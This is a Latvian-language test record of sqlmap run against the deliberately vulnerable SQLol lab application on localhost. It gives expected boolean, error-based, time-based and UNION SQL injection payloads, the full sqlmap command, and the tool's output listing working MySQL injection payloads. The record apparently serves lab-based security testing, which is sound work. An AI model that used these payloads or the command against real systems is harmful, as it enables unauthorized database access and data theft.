=================================================================================
1. Īpašība: tiek izprintēts tikai viens tabulas ieraksts, vaicājums netiek rādīts
2. Nepiciešams tampering: nē
3. Sagaidāmais rezultāts: 
3.1. boolean-based: ?inject_string=test' OR '1'='1
3.2. error-based: ?inject_string=test'
3.3. time-based: ?inject_string=test' or sleep(1)%23
3.4. union: ?inject_string=test' union select 1%23
4. Reālais rezultāts: redzams zemāk
5. Vidējais risinājuma ilgums: 16497060 nanosekundes
6. Palaistā komanda
sqlmap -u "http://localhost/MCIR/sqlol/select.php?sanitization_level=none&sanitization_type=keyword&sanitization_params=&query_results=one_row&error_level=verbose&inject_string=test&location=where_string&submit=Inject%21" -p inject_string --risk=3 --level=5

7. Jautājumi, kurus uzdeva SQLMap:
7.1. it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
7.2. GET parameters 'inject_string' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
=================================================================================
sqlmap identified the following injection point(s) with a total of 137 HTTP(s) requests:
---
Parameter: inject_string (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: sanitization_level=none&sanitization_type=keyword&sanitization_params=&query_results=one_row&error_level=verbose&inject_string=-4793' OR 9932=9932-- JQWT&location=where_string&submit=Inject!

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: sanitization_level=none&sanitization_type=keyword&sanitization_params=&query_results=one_row&error_level=verbose&inject_string=test' AND GTID_SUBSET(CONCAT(0x7170787671,(SELECT (ELT(3529=3529,1))),0x717a787871),3529)-- fdqf&location=where_string&submit=Inject!

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: sanitization_level=none&sanitization_type=keyword&sanitization_params=&query_results=one_row&error_level=verbose&inject_string=test' AND (SELECT 6104 FROM (SELECT(SLEEP(5)))gtxf)-- SRBD&location=where_string&submit=Inject!

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: sanitization_level=none&sanitization_type=keyword&sanitization_params=&query_results=one_row&error_level=verbose&inject_string=test' UNION ALL SELECT CONCAT(0x7170787671,0x43436a456c6b73424e545676626b555a454b55494e746a6b6a486c766e7474755051637a76496d4d,0x717a787871)-- -&location=where_string&submit=Inject!
---
web application technology: Apache 2.4.38, PHP 5.6.40
back-end DBMS: MySQL >= 5.6
